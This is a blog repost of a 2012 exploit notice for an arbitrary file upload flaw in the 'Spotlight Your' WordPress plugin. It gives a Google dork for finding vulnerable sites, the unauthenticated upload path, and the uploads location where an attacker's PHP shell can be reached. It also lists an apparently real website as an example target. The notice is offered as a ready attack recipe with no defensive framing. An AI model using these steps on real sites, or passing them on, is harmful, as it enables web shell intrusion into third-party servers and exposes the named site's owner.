J2TEAM Security: A must-have extension for Chrome users. Install now!

Wordpress Plugins Spotlight Upload Vulnerability

Wordpress Plugins Spotlight Upload Vulnerability | Juno_okyo's Blog
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.com

################################################################################​​#################



[+] POC



Exp. Target :

- http://domain.com/wp-content/plugins/spotlightyour/



Exploit :

- /monetize/upload/index.php



Shell Access :

- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php


Examples


http://www.buyusadeals.com/wp-content/pl.../index.php




############################################################​
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!